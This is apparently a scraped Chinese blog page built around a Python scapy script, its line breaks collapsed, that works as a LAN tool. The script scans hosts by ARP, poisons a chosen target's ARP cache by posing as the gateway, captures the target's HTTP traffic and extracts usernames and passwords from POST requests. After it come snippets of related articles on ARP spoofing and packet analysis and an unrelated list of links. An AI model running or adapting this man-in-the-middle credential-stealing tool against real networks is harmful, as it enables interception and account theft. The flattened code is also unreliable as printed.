from scapy.all import *
import os
import re
import time
import threading
result=os.popen("route print").read()
re1=re.findall(r"0\.0\.0\.0\s+0\.0\.0\.0\s+(.+?)\s+(.+?)\s",result)
gateway=re1[0][0]   #获取本机网关
ip=re1[0][1]   #获取本机ip
addr={}
print(ip,gateway)
def scan(IpScan):print("扫描中,请稍候...")#r与srp,发送并接受,且sr不能发送二层协议,srp才能。#ans是收到的有响应的包,unans指收到的没有响应的包。ans,unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=IpScan),timeout=2,verbose=0)print("本次扫描一共扫描到%d台主机:" % len(ans))for send,recv in ans:  #接受对方回应包里面的Mac地址和IP地址print("%s----%s"%(recv[Ether].src,recv[ARP].psrc))  #将对方的回应的Mac地址和IP地址存到字典里面key=ip,value=macaddr[recv[ARP].psrc]=recv[Ether].src
def cap(tt,m):#监听接收方ip是m的https信息tt秒,并存到pks里面pkts=sniff(filter="tcp dst port 80 and host {}".format(m),timeout=tt)wrpcap("demo.pcap",pkts)  #保存在同一目录,生成demo.pcap文件print("抓包数据已保存!")
def spoof():m=input("请输入一个攻击目标:")t1=int(input("请输入攻击时间:"))t=threading.Thread(target=cap,args=(t1,m))t.start()for i in range(t1*5):#arp欺骗,冒充网关给m发包sendp(Ether(dst=addr[m])/ARP(psrc=gateway,pdst=m),verbose=0)time.sleep(0.1)print("攻击完成!")
def analyze():pkts=rdpcap("demo.pcap")#读取包for p in pkts:if p.haslayer(Raw):#找出有上网数据的try:httpr=p.load.decode()if not httpr.startswith("GET"):   #找post的包#userName=17791911663&passWord=abc123456username=re.findall(r"userName=(\w+)",httpr)pwd=re.findall(r"passWord=(\w+)",httpr)if username and pwd:print(time.ctime(p.time))print("用户名:",username[0])print("密码:",pwd[0])except:pass
while 1:print("欢迎使用我的局域网小工具:")print("1    扫描")print("2    欺骗")print("3    分析")print("4    退出")op=input("你的操作:")if op=="1":scan(ip+"/24")elif op=="2":spoof()elif op=="3":analyze()else:break
print("再见!")

python 实现扫描器,arp欺骗,数据包分析。相关推荐

  1. 网络安全—arp欺骗原理数据包分析

    网络安全-arp欺骗原理&数据包分析 提要:arp欺骗虽然比较简单,但是在日常面试中也是会被经常问到的问题,本文将通过kali中的arpspoof工具进行arp攻击,同时使用wireshark ...

  2. arp协议分析python编程实现arp欺骗抓图片

    arp协议分析&python编程实现arp欺骗抓图片 序 学校tcp/ip协议分析课程老师布置的任务,要求分析一种网络协议并且研究安全问题并编程实现,于是我选择了研究arp协议,并且利用pyt ...

  3. python实现——数据包分析

    需求分析 工作中经常会碰到设备大量告警,收到成百上千的取证包,面对如此众多的数据包,如何确认这些取证包是不是正确告警的结果呢?只能打开数据包分析看有没有相关攻击特征.由此,可以使用snort进行检测, ...

  4. python+scapy实现ARP欺骗

    python+scapy实现ARP欺骗 需要下载的库 ARP欺骗原理 源代码: 运行结果 需要下载的库 可以直接通过pip下载 pip install scapy ARP欺骗原理 设网关的IP为10. ...

  5. 《Wireshark数据包分析实战(第2版)》目录—导读

    版权声明 Wireshark数据包分析实战(第2版) Copyright © 2011 by Chris Sanders. Title of English-language original:Pra ...

  6. 网络数据包分析工具列表

    此列表内容主要来自于某书的附录部分. 1.WireShark,这方面神器级工具,不赘述,自己好好学吧. 2.tcpdump和windump,完全基于文本的数据包捕获和分析 3.Cain&Abe ...

  7. pcap文件解析工具_【免费毕设】PHP网络数据包分析工具的设计与开发(源代码+论文)...

    点击上方"蓝字"关注我们目录 系统设计 网络数据包分析系统的设计 整个网络数据报分析工具采用模块化的设计思想,原因是许多程序太长或太复杂,很难写在单一单元中.如果把代码分为较小的功 ...

  8. ARP协议抓包分析 -- wireshark

    ARP协议抓包分析 – wireshark ARP- Address Resolution Protocol协议,即地址解析协议.该协议功能就是将IP地址解析成MAC地址. 在发送数据的时候,只知道目 ...

  9. 写一个java的网络数据包分析程序(一)

    需要写一个工具监控我所负责项目中的服务器与客户端的交易事件,而我又不方便修改系统代码(因为此工具只是我自己为了工作方便而作),因此需要通过监听并分析网络数据包来获取信息. 原本打算将tcpdump的C ...

  10. tcpdump使用详解及数据包分析

    tcpdump使用与数据分析 语法 tcpdump(选项) 选项 -A 以ASCII码方式显示每一个数据包(不会显示数据包中链路层头部信息). 在抓取包含网页数据的数据包时, 可方便查看数据(nt: ...

最新文章

  1. 预训练BERT学习笔记_Storm*Rage的博客
  2. 全选或者单选checkbox的值动态添加到div
  3. 收藏:Asp.net中基于Forms验证的角色验证授权
  4. 用 Python 分析了 20 万场吃鸡数据,看看玩家群体是怎么样的
  5. 简述python程序执行原理_Python程序的执行原理(1)
  6. javascript中setInterval,setTimeout的区别跟用法
  7. UVA1585 Score
  8. [Pyramid 杂记]Static Routes,静态路由是用来干什么的?
  9. 关于近期对自己的总结
  10. JS判断UA动态加载CSS的方法
  11. idea 热部署无效
  12. 20145209 《信息安全系统设计基础》第10周学习总结
  13. 贝叶斯算法伪代码_字节跳动算法面经
  14. 黑马程序员 接口 总结
  15. 无线网络安全——1、WiFi安全基础知识
  16. 用Python做一个Mean Rerversion策略
  17. 微创脑科学上市破发:公司市值143亿港元 微创医疗是大股东
  18. 芯片ECO的种类和修复方法介绍
  19. 使用阿里云DNS实现自己的DDNS服务
  20. 5g局域网传输速度_5G时代网络传输速度能达到多少?

热门文章

  1. ACM进阶大一到大三
  2. 金融与量化分析 一; 金融 股票知识入门
  3. Android app 后台被杀恢复
  4. 逐梦电竞:雷神“光追”游戏电脑新年首发
  5. 如何提取Excel表格各sheet名称
  6. java maincase 电影票的售卖与购买 day10-11
  7. 苹果每部iPhone4S可赚3917元 开售首日收入39亿元
  8. php 计算ip段开始ip
  9. 商协社团汕头发展-全国工商联·万祥军:企业家论坛研究转型
  10. 读书百客:《感遇·江南有丹橘》赏析